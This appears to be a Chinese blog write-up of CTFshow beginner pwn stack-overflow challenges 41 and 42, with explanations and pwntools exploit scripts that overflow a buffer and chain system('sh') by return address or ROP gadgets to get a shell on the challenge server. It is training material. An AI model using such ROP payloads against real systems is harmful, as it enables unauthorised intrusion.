CTFshow-PWN入门-栈溢出pwn41~pwn48

已于 2023-08-25 17:02:13 修改
阅读量2.4k 收藏 11
点赞数 3
分类专栏: pwn ctf ctfshow 文章标签: linux
于 2023-08-25 17:00:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_63576152/article/details/132499511
版权

本文主要详解CTFshow中pwn入门系列的栈溢出模块的其中8题

所用工具:linux环境下的虚拟机、IDA Pro、exeinfope

以下操作中小编用的都是自己的kali环境

pwn41

32位文件,有NX保护

存在栈溢出、后门函数和system调用,这里有"sh",而不是"/bin/sh"

这里先介绍一下/bin/sh和/sh的区别:

system("/bin/sh") 是直接指定了系统默认的shell程序路径来执行命令,这种方式可以确保使用系统默认的shell程序执行命令,因为 /bin/sh 链接通常指向默认shell的可执行文件。
system("sh") 则会直接启动一个名为sh的shell程序,依赖系统的环境变量 $PATH 来查找 sh 可执行文件并执行。如果系统的环境变量设置正确,这两种方式是等效的;

exp如下:

from pwn import *

p = remote('pwn.challenge.ctf.show','28132')

offset = 0x12 + 4
system = 0x80483D0
#elf = ELF('./pwn')
#system = elf.sym['system']
sh = 0x80487BA
payload = offset * b'a' + p32(system) + b'aaaa' + p32(sh)

p.sendline(payload)
p.interactive()

pwn42

64位,有NX保护。内容和pwn41一样,只有位数的区别

exp如下:

from pwn import *

p = remote('pwn.challenge.ctf.show','28217')

offset = 0xA + 8
system_addr = 0x400560
sh_addr = 0x400872
rdi_addr = 0x400843
ret_addr = 0x40053e
payload = offset * b'a' + p64(rdi_addr) + p64(sh_addr) + p64(ret_addr) + p64(system_addr)

p.sendline(payload)
p.interactive()

pwn43

32位,有NX保护

最低0.47元/天 解锁文章
CTFSHOW-PWN入门-栈溢出(35-42)
2402_84585385的博客
10-09 1006
发现hint函数中存在system函数,useful函数存在sh,根据题目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x80487BA。发现hint函数中存在system函数,useful函数存在sh,根据题目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x400872。ctfshow函数中的,v1大小为14,而read函数读取大小为50,所以read函数存在栈溢出,使用cyclic计算栈偏移量为22。ctfshow函数中的read函数存在栈溢出,cyclic计算栈偏移量为18。
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1610
本文主要详解CTFshowpwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
ctfshow做题笔记—栈溢出pwn41~pwn44(创作纪念日更新)
Yilanchia的博客
02-07 980
在利用buf2的地方根本上就是利用0x804b000 - 0x804c000这个数据段,所以可以使用0x804c000-16作为bin_addr把payload中的buf2_addr换为bin_addr。/bin/sh:是系统中默认 Shell 解释器的绝对路径,通常是一个指向具体 Shell 的符号链接(如 dash、bash 等)。若 PATH 包含 /bin,则 sh 实际会调用 /bin/sh。打开ida查看的确没有/bin/sh,但是一想,可不可以写入一个/bin/sh呢。
ctfshow pwn45
saulgoodman的博客
07-06 329
简单的ret2libc。
CTFshow-pwn入门-栈溢出pwn41-pwn42
你们de4月天的博客
12-27 1223
CTFshow-pwn入门-栈溢出pwn41-pwn42
CTFshow-PWN-栈溢出pwn41-pwn42)
Welcome To Myon'Blog !
04-24 868
32位的 system();但是没"/bin/sh" ,好像有其他的可以替代检查一下:32 位程序ida32 分析:跟进 ctfshow 函数:存在栈溢出buf 到栈底距离:0x12存在 system 函数:system 函数地址:0x80483D0但是并未找到 /bin/sh找到了一个 useful 函数:该函数调用了 printf 函数,并传入字符串 "sh" 作为参数,然后将 printf 函数的返回值作为 useful 函数的返回值。
ctfshow做题笔记—栈溢出pwn45~pwn48
最新发布
Yilanchia的博客
02-10 765
但是怎么都timeout,偏移量是重新用pwndbg调试出来的,看来确实有点小错误。于是去学习了一些其他大佬的写法,也学到了一些应对办法。两天没更了,因为打了VNCFTF,还是太弱了,只能做一道异形文字的misc就结束了,pwn一直打不通(先打开ida瞅瞅,其实题目也说了无system无/bin/sh。没有write了,试试用puts吧,更简单了呢。被上一道题硬控半天,这道题不会也要被硬控吧。哎呦,确实可以,也算是对模板越来越熟悉了。由于lib库已经装在本地,省大事了。),于是沉默一天,还是继续学习吧。
CTFshow-pwn入门-栈溢出pwn43-pwn44
你们de4月天的博客
12-27 1821
CTFshow-pwn入门-栈溢出pwn43-pwn44
CTFshow-PWN入门-栈溢出38-40详解 持续更新
王慕杨。的博客
09-06 944
本来是不想写的,但是想想还是写一下吧,基础知识这些就先不写了,以后有时间再补上吧,比较懒前面的有时间再写吧 主要是做过了。。懒。
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 5459
本文主要详解CTFshowpwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
CTFshow-PWN-栈溢出pwn45)
Welcome To Myon'Blog !
05-20 1399
我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容,由于 libc 的延迟绑定机制,我们需要泄漏已经执行过的函数的地址。system 函数属于libc,而 libc.so 动态链接库中的函数之间相对偏移是固定的,即使程序有 ASLR 保护,也只是针对于地址中间位进行随机,最低的 12 位并不会发生改变。PLT用于间接调用共享库中的函数。这些方法和函数通常用于在漏洞利用过程中查找特定函数的地址(例如 system 函数)或特定字符串的地址(例如 /bin/sh 字符串)。
ctfshow 命令执行46关到70关 解题思路 理解及答案
2301_78362619的博客
12-28 1888
ctfshow我看行
CTFshow-pwn入门-栈溢出 (慢慢更
akdelt的博客
01-31 3594
当应用程序试图对无权访问的内存地址进行读写操作时,会调用 sigsegv_handler 函数,sigsegv_handler 函数 会把stderr打印输出,即将flag的值打印输出那么我们直接输入超长数据就会溢出,程序就会崩溃进而打印出flag。char dest;该函数无法限制输入的长度,可能会超出s数组的容量,导致覆盖栈上的其他数据或执行任意代码。这也是明显的栈溢出漏洞,且提供后门函数 get_flag()堆栈不可执行,不过有后门函数,跟进 ctfshow 函数,read 可以读取 50 个字节。
buuctf习题pwn41~50)
yw__y的博客
09-27 511
堆的题还没写
关于pwn64位amd构造payload时的堆栈平衡问题以及32位与64位构造payload的区别与注意事项
hu_c_t_f的博客
07-24 3900
pwn入门栈溢出漏洞是比较合适的。但我们经常会遇到i386【下面称32位】和arm64【下面称64位】的可执行程序【题目附件】。而32位与64位同样的情况,比如同样是ret2text或ret2syscall时,写的payload是不一样的,但大体的思路是一样的。本人也是入门pwn的小白,写的不对的地方还请师傅们指出。栈堆平衡32位中,没有堆栈平衡一说,而64位中有。payload中的堆栈平衡简单来说,就是要保证payload的字节数是16的倍数。
pwn刷题num43---栈迁移
tbsqigongzi的博客
05-03 779
BUUCTF-PWN-ciscn_2019_es_2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下伪代码 可以看到read函数读入0x30字节给s,可是s是0x28字节大小,只相差0x8字节,只能覆盖ebp和函数返回地址,而程序中无直接getshell的函数,程序
ctfshow 常用姿势
qq_53063436的博客
11-02 1179
ctfshow 常用姿态
ctfshow [栈溢出]---pwn47
saulgoodman的博客
07-07 207
刷了一天快手了,起来做一道题锻炼一下脑子!
ctf.show--pwn入门做题记录(一)
2401_87685579的博客
11-16 399
ctfshow的个人做题思路
CTFSHOW-PWN入门 pwn5
01-10
### CTF SHOW PWN入门 pwn5 解法 对于CTF SHOW平台上的PWN挑战,尤其是针对`pwn5`这一题目,解决方法通常涉及对二进制漏洞的理解以及如何利用这些漏洞来获取flag。 #### 题目分析 在处理这类问题时,首先需要下载...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值